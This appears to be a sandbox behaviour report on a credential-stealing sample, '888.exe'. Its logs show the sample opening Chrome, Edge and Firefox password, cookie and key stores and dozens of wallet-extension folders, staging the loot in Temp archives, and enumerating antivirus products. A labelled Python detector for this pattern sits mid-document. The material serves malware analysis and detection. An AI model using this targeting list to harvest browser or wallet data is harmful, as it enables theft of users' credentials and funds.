              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Autofill\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Autofill\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Autofill\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Autofill\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\out.zip VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\888.exeCode function: 0_2_00D973D3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00D973D3
              Source: C:\Users\user\Desktop\888.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
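The entries above (a categorised staging tree under %LOCALAPPDATA%\Temp, a sensitive-files.zip and out.zip archive, and an AntiVirusProduct query against root\SecurityCenter2) together with the browser-store opens listed under Stealing of Sensitive Information below are the observable pattern of this stealer. The following is an added example, not code from the Joe Sandbox report or from the malware, of a detector that correlates those three behaviours per process over file and WMI events. The Event record layout, the scoring weights, the 20-character staging-directory heuristic and the list of store file names are assumptions of this example; the sample events are constructed from paths in this report.

```python
"""Added example (not part of the Joe Sandbox report): correlate browser-store
reads, a categorised Temp staging tree, archive creation and WMI AV enumeration
per process, and flag the combination this report shows. Event fields, weights
and the staging-name heuristic are assumptions; sample paths come from the report."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Real credential/session store file names of Chromium- and Firefox-based browsers.
BROWSER_STORES = re.compile(
    r"\\(Login Data|Web Data|Cookies|History|key4\.db|logins\.json|cookies\.sqlite)$",
    re.IGNORECASE,
)
# Chromium extension storage: 32 letters a-p, as in the report's "Local Extension Settings" entries.
EXT_SETTINGS = re.compile(r"\\Local Extension Settings\\[a-p]{32}$", re.IGNORECASE)
# Staging layout seen in this report: %LOCALAPPDATA%\Temp\<random name>\<category>\... (20+ chars is an assumption).
STAGING = re.compile(
    r"^(?P<root>.*\\AppData\\Local\\Temp\\[A-Za-z0-9]{20,})\\"
    r"(Passwords|Cookies|Autofill|CreditCards|History|Downloads|Wallets)(\\|$)",
    re.IGNORECASE,
)
ARCHIVE = re.compile(r"\.zip$", re.IGNORECASE)
AV_ENUM = re.compile(r"root\\SecurityCenter2.*FROM\s+AntiVirusProduct", re.IGNORECASE)

# Processes that legitimately open their own stores; never flagged here.
BROWSER_OWNERS = ("chrome.exe", "msedge.exe", "firefox.exe")


@dataclass
class Event:
    process: str   # image path or name of the acting process
    op: str        # "open", "write" or "wmi"
    target: str    # file path, or the WMI query text


def _browser_of(path):
    """Map a profile path to the browser that owns it (None if not a known browser)."""
    low = path.lower()
    if "\\google\\chrome\\" in low:
        return "chrome"
    if "\\microsoft\\edge\\" in low:
        return "edge"
    if "\\mozilla\\firefox\\" in low:
        return "firefox"
    return None


def score_process(events):
    """Return {process: findings} for processes showing the stealer pattern.

    A process is flagged when it reads stores of at least two browsers it does
    not own AND writes a categorised staging tree under Temp. Creating a .zip
    and enumerating AV products via WMI each add 10 to the score."""
    per_proc = defaultdict(lambda: {"stores": set(), "staging": set(),
                                    "archives": set(), "av_enum": False})
    for ev in events:
        rec = per_proc[ev.process.lower()]
        if ev.op == "open" and (BROWSER_STORES.search(ev.target) or EXT_SETTINGS.search(ev.target)):
            rec["stores"].add(ev.target)
        elif ev.op == "write":
            m = STAGING.match(ev.target)
            if m:
                rec["staging"].add(m.group("root"))
            if ARCHIVE.search(ev.target):
                rec["archives"].add(ev.target)
        elif ev.op == "wmi" and AV_ENUM.search(ev.target):
            rec["av_enum"] = True

    findings = {}
    for proc, rec in per_proc.items():
        if proc.rsplit("\\", 1)[-1] in BROWSER_OWNERS:
            continue
        browsers = {_browser_of(p) for p in rec["stores"]} - {None}
        if len(browsers) >= 2 and rec["staging"]:
            score = 70 + 10 * bool(rec["archives"]) + 10 * rec["av_enum"]
            findings[proc] = {"score": score, "browsers": sorted(browsers),
                              "staging_roots": sorted(rec["staging"]),
                              "archives": sorted(rec["archives"]),
                              "av_enum": rec["av_enum"]}
    return findings


# Constructed sample: a subset of this report's entries plus one benign event
# (Chrome opening its own Login Data) that must not fire.
STEALER = r"C:\Users\user\Desktop\888.exe"
TMP = r"C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta"
SAMPLE_EVENTS = [
    Event("chrome.exe", "open", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event(STEALER, "open", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event(STEALER, "open", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    Event(STEALER, "open", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn"),
    Event(STEALER, "open", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    Event(STEALER, "open", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db"),
    Event(STEALER, "write", TMP + r"\Passwords\Chrome_Default.txt"),
    Event(STEALER, "write", TMP + r"\Cookies\Edge_Default_Network.txt"),
    Event(STEALER, "write", TMP + r"\sensitive-files.zip"),
    Event(STEALER, "wmi", r"root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct"),
]

if __name__ == "__main__":
    for proc, finding in score_process(SAMPLE_EVENTS).items():
        print(proc, finding)
```

Feeding real Sysmon file-create and WMI events into `Event` records is the only adaptation needed; the two-browser requirement keeps a single browser's own maintenance of its databases, or a backup tool copying one profile, below the threshold.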

              Stealing of Sensitive Information

Source: Yara match | File source: 888.exe, type: SAMPLE
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 0.2.888.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.888.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1849050689.000000000131F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 888.exe PID: 7888, type: MEMORYSTR
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\chgfefjpcobfbnpmiokfjjaglahmnded
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklb
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\admmjipmmciaobhojoghlmleefbicajg
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dtbqpus9.default\cookies.sqlite
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkk
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\caljgklbbfbcjjanaijlacgncafpegll
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioameka
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhl
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmided
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\025af778-db9d-49f0-b172-4eb563717cb5\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehidddafch
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbml
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbb
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpei
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliob
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdb
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\icmkfkmjoklfhlfdkkkgpnpldkgdmhoe
